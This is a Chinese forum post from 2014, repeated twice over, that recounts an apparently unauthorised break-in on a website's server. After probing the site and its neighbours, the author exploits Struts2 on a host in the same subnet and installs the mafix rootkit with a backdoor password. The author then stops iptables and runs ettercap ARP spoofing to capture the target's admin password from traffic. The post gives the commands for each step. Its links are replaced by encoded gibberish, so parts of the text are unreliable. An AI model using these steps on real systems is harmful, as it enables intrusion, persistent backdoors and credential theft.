-
-
Linux下嗅探密码拿下服务器
-
发表于: 2014-12-31 15:01 890
-
0x01 主站踩点
主站dedecms 目前公布的0day没有一个能用的,并且后台不是默认的,google hack无果。
0x02 旁站分析
旁站有二十多个,大部分是现场的cms的二次开发,没有漏洞,还有一个bbs dz,同样也没有漏洞
0x03 C段Linux主机突破
查询C段 浏览网站 发现一个 ssss.com/login.action ,熟悉吧 struct2代码执行 不解释
0x04 Linux主机 栽Rookit
这里我用的Rookit是mafix
执行命令:
tar zxvf mafix.tar.gz
chmod +x root
./root password 23141
Putty登录
注意 如果防火墙开着的话,不愿意在防火墙里添加规则的话可以关掉防火墙
停止防火墙
/etc/init.d/iptables stop
版本
0x05 Linux主机 安装ettercap 嗅探密码
1、 下载与安装EPEL的RPM包。
rpm -ivh ac9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2k6X3g2V1L8%4u0S2M7s2u0G2K9X3g2U0N6q4)9J5k6h3!0J5k6#2)9J5c8Y4m8#2j5W2)9J5c8X3g2H3k6h3I4Q4x3V1j5#2i4K6u0r3K9e0x3^5y4W2)9J5c8X3g2H3k6h3I4Q4x3X3c8J5k6h3I4W2j5i4y4W2i4K6u0V1y4g2)9J5k6o6c8Q4x3X3g2F1L8$3q4J5j5$3S2Q4x3X3g2J5M7r3@1`.
2、 yum -y install ettercap
开始嗅探
开启转发(可能不需要)
echo 1 > /proc/sys/net/ipv4/ip_forward
嗅探
ettercap –T –M arp /目标ip/80 /网关/ -w /tmp/log.txt
嗅探时间可能会挺长 可以后台运行
nohup ettercap –T –M arp /目标ip/80 /网关/-w /tmp/log.txt
0x06 数据筛选
由于这个网站的数据特别大,一小时的数据有1g多,好吧,grep筛选出
抓包分析出目标站前台提交的密码的字段 pwd
cat /tmp/log.txt | grep –a “&pwd=” | more
好吧,每隔几小时我就看一次,过了半天,嗅到后台密码了,同时也嗅到后台地址了
bd0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8Y4S2^5P5q4)9J5c8X3I4G2k6$3W2F1i4K6u0W2M7r3S2H3i4K6g2p5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8Y4S2^5P5q4)9J5c8X3I4G2k6$3W2F1i4K6u0W2M7r3S2H3i4K6g2p5N6%4N6%4i4K6u0W2P5s2S2^5i4K6u0W2j5$3!0E0i4K6u0r3P5s2S2^5i4K6u0r3L8r3!0Y4K9h3&6Q4x3X3g2H3K9s2l9`.
0x07 上传一句话 root提权
主站dedecms 目前公布的0day没有一个能用的,并且后台不是默认的,google hack无果。
0x02 旁站分析
旁站有二十多个,大部分是现场的cms的二次开发,没有漏洞,还有一个bbs dz,同样也没有漏洞
0x03 C段Linux主机突破
查询C段 浏览网站 发现一个 ssss.com/login.action ,熟悉吧 struct2代码执行 不解释
0x04 Linux主机 栽Rookit
这里我用的Rookit是mafix
执行命令:
tar zxvf mafix.tar.gz
chmod +x root
./root password 23141
Putty登录
注意 如果防火墙开着的话,不愿意在防火墙里添加规则的话可以关掉防火墙
停止防火墙
/etc/init.d/iptables stop
版本
0x05 Linux主机 安装ettercap 嗅探密码
1、 下载与安装EPEL的RPM包。
rpm -ivh ac9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8D9i4K6u0W2k6X3g2V1L8%4u0S2M7s2u0G2K9X3g2U0N6q4)9J5k6h3!0J5k6#2)9J5c8Y4m8#2j5W2)9J5c8X3g2H3k6h3I4Q4x3V1j5#2i4K6u0r3K9e0x3^5y4W2)9J5c8X3g2H3k6h3I4Q4x3X3c8J5k6h3I4W2j5i4y4W2i4K6u0V1y4g2)9J5k6o6c8Q4x3X3g2F1L8$3q4J5j5$3S2Q4x3X3g2J5M7r3@1`.
2、 yum -y install ettercap
开始嗅探
开启转发(可能不需要)
echo 1 > /proc/sys/net/ipv4/ip_forward
嗅探
ettercap –T –M arp /目标ip/80 /网关/ -w /tmp/log.txt
嗅探时间可能会挺长 可以后台运行
nohup ettercap –T –M arp /目标ip/80 /网关/-w /tmp/log.txt
0x06 数据筛选
由于这个网站的数据特别大,一小时的数据有1g多,好吧,grep筛选出
抓包分析出目标站前台提交的密码的字段 pwd
cat /tmp/log.txt | grep –a “&pwd=” | more
好吧,每隔几小时我就看一次,过了半天,嗅到后台密码了,同时也嗅到后台地址了
bd0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8Y4S2^5P5q4)9J5c8X3I4G2k6$3W2F1i4K6u0W2M7r3S2H3i4K6g2p5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8Y4S2^5P5q4)9J5c8X3I4G2k6$3W2F1i4K6u0W2M7r3S2H3i4K6g2p5N6%4N6%4i4K6u0W2P5s2S2^5i4K6u0W2j5$3!0E0i4K6u0r3P5s2S2^5i4K6u0r3L8r3!0Y4K9h3&6Q4x3X3g2H3K9s2l9`.
0x07 上传一句话 root提权
赞赏
赞赏
雪币:
留言: